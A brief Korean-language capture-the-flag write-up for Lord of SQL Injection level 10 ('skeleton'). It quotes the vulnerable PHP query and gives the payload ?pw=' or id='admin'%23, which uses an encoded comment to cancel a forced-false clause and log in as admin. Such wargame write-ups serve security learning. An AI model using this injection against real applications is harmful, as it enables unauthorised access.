Lord of SQL Injection 10번 문제 - skeleton

 

  $query = "select id from prob_skeleton where id='guest' and pw='{$_GET[pw]}' and 1=0"; 

보면 뒤에 and 1=0 을 넣어서 pw안에 입력을 무엇으로 받던 1=0 때문에 무조건 거짓이 되게 된다.

 

여기서 생각해볼것은 pw안에 정답을 넣고 뒤에있는 and 1=0 은 주석처리를 하면 되지 않을까?

 

?pw=' or id='admin'%23 입력

따라서 id는 admin으로 입력하여 문제는 해결하게되고 뒤에 and 1=0 은 #을 인코딩한값 %23 을 넣어 주석처리를하게 되며 문제 해결한다.